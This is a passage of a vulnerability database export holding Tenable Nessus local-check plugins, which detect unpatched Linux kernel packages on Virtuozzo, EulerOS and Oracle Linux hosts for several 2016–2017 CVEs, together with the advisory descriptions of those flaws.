Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux\nattributes on /proc/pid/attr files. An empty (null) write to this file\ncan crash the system by causing the system to attempt to access\nunmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting\nCVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The\nCVE-2017-2618 issue was discovered by Paul Moore (Red Hat\nEngineering).\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0933.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?96946551\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0933\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.16.1.vl7\",\n \"kernel-abi-whitelists-3.10.0-514.16.1.vl7\",\n \"kernel-debug-3.10.0-514.16.1.vl7\",\n \"kernel-debug-devel-3.10.0-514.16.1.vl7\",\n \"kernel-devel-3.10.0-514.16.1.vl7\",\n \"kernel-doc-3.10.0-514.16.1.vl7\",\n \"kernel-headers-3.10.0-514.16.1.vl7\",\n \"kernel-tools-3.10.0-514.16.1.vl7\",\n \"kernel-tools-libs-3.10.0-514.16.1.vl7\",\n \"kernel-tools-libs-devel-3.10.0-514.16.1.vl7\",\n \"perf-3.10.0-514.16.1.vl7\",\n \"python-perf-3.10.0-514.16.1.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:22:03", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "EULEROS_SA-2017-1072.NASL", "href": "https://www.tenable.com/plugins/nessus/99938", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1072)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99938);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-6951\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1072)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1072\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f628b4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.49.58.45\",\n \"kernel-debug-3.10.0-327.49.58.45\",\n \"kernel-debug-devel-3.10.0-327.49.58.45\",\n \"kernel-debuginfo-3.10.0-327.49.58.45\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.49.58.45\",\n \"kernel-devel-3.10.0-327.49.58.45\",\n \"kernel-headers-3.10.0-327.49.58.45\",\n \"kernel-tools-3.10.0-327.49.58.45\",\n \"kernel-tools-libs-3.10.0-327.49.58.45\",\n \"perf-3.10.0-327.49.58.45\",\n \"python-perf-3.10.0-327.49.58.45\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:22:03", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "EULEROS_SA-2017-1071.NASL", "href": "https://www.tenable.com/plugins/nessus/99937", "published": "2017-05-03T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1071)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99937);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2018/11/14 14:36:23\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-6951\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1071)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key. (CVE-2016-8650)\n\n - A flaw was found in the Linux kernel's implementation\n of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt()\n system call. Users with non-namespace CAP_NET_ADMIN are\n able to trigger this call and create a situation in\n which the sockets sendbuff data size could be negative.\n This could adversely affect memory allocations and\n create situations where the system could crash or cause\n memory corruption. (CVE-2016-9793)\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory. (CVE-2017-2618)\n\n - The keyring_search_aux function in\n security/keys/keyring.c in the Linux kernel through\n 3.14.79 allows local users to cause a denial of service\n (NULL pointer dereference and OOPS) via a request_key\n system call for the 'dead' type.(CVE-2017-6951)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1071\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2f2a57f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.127\",\n \"kernel-debug-3.10.0-229.49.1.127\",\n \"kernel-debuginfo-3.10.0-229.49.1.127\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.127\",\n \"kernel-devel-3.10.0-229.49.1.127\",\n \"kernel-headers-3.10.0-229.49.1.127\",\n \"kernel-tools-3.10.0-229.49.1.127\",\n \"kernel-tools-libs-3.10.0-229.49.1.127\",\n \"perf-3.10.0-229.49.1.127\",\n \"python-perf-3.10.0-229.49.1.127\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:41:57", "bulletinFamily": "scanner", "description": "Description of changes:\n\n- [3.10.0-514.16.1.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug \n22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel \n(olkmod_signing_key.x509)(<A HREF=", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-0933-1.NASL", "href": "https://www.tenable.com/plugins/nessus/99386", "published": "2017-04-14T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0933-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-0933-1.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99386);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:17\");\n\n script_cve_id(\"CVE-2016-8650\", \"CVE-2016-9793\", \"CVE-2017-2618\", \"CVE-2017-2636\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0933-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n- [3.10.0-514.16.1.0.1.el7.OL7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug \n22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel \n(olkmod_signing_key.x509)(<A HREF='https://oss.oracle.com/mailman/listinfo/el-errata'>alexey.petrenko at oracle.com</A>)\n- Update x509.genkey [bug 24817676]\n\n[3.10.0-514.16.1.el7]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') \n[1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in \ndm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin \nCoddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as \nstale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 \n1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic \ntransition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state \n(Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik \nBrueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) \n[1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) \n[1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) \n[1422368 1422369] {CVE-2017-2618}\n- [virtio] balloon: check the number of available pages in leak balloon \n(David Hildenbrand) [1417194 1401615]\n- [infiniband] ib/rdmavt: Only put mmap_info ref if it exists (Jonathan \nToppins) [1417191 1391299]\n- [x86] kvm: x86: make lapic hrtimer pinned (Luiz Capitulino) [1416373 \n1392593]\n- [kernel] sched/nohz: Fix affine unpinned timers mess (Luiz Capitulino) \n[1416373 1392593]\n- [kernel] nohz: Affine unpinned timers to housekeepers (Luiz \nCapitulino) [1416373 1392593]\n- [kernel] tick-sched: add housekeeping_mask cpumask (Luiz Capitulino) \n[1416373 1392593]\n- [x86] platform/uv/bau: Add UV4-specific functions (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Fix payload queue setup on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Disable software timeout on UV4 hardware (Frank \nRamsay) [1414715 1386692]\n- [x86] platform/uv/bau: Populate ->uvhub_version with UV4 version \ninformation (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Use generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Add generic function pointers (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Convert uv_physnodeaddr() use to \nuv_gpa_to_offset() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up pq_init() (Frank Ramsay) [1414715 1386692]\n- [x86] platform/uv/bau: Clean up and update printks (Frank Ramsay) \n[1414715 1386692]\n- [x86] platform/uv/bau: Clean up vertical alignment (Frank Ramsay) \n[1414715 1386692]\n- [virtio] virtio-pci: alloc only resources actually used (Laurent \nVivier) [1413093 1375153]\n- [net] avoid signed overflows for SO_{SND|RCV}BUFFORCE (Sabrina \nDubroca) [1412473 1412474] {CVE-2016-9793}\n- [netdrv] sfc: clear napi_hash state when copying channels (Jarod \nWilson) [1401461 1394304]\n- [lib] mpi: Fix NULL ptr dereference in mpi_powm() (Mateusz Guzik) \n[1398457 1398458] {CVE-2016-8650}\n- [scsi] lpfc: Fix eh_deadline setting for sli3 adapters (Ewan Milne) \n[1430687 1366564]\n- [md] dm round robin: revert 'use percpu 'repeat_count' and \n'current_path'' (Mike Snitzer) [1430689 1422567]\n- [md] dm round robin: do not use this_cpu_ptr() without having \npreemption disabled (Mike Snitzer) [1430689 1422567]\n- Revert: [x86] Handle non enumerated CPU after physical hotplug (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] smp: Don't try to poke disabled/non-existent APIC \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] smpboot: Init apic mapping before usage (Prarit \nBhargava) [1426633 1373738]\n- Revert: [x86] revert 'perf/uncore: Disable uncore on kdump kernel' \n(Prarit Bhargava) [1426633 1373738]\n- Revert: [x86] perf/x86/intel/uncore: Fix hardcoded socket 0 assumption \nin the Haswell init code (Prarit Bhargava) [1426633 1373738]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006863.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages. Note that the updated packages\nmay not be immediately available from the package repository and its\nmirrors.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", 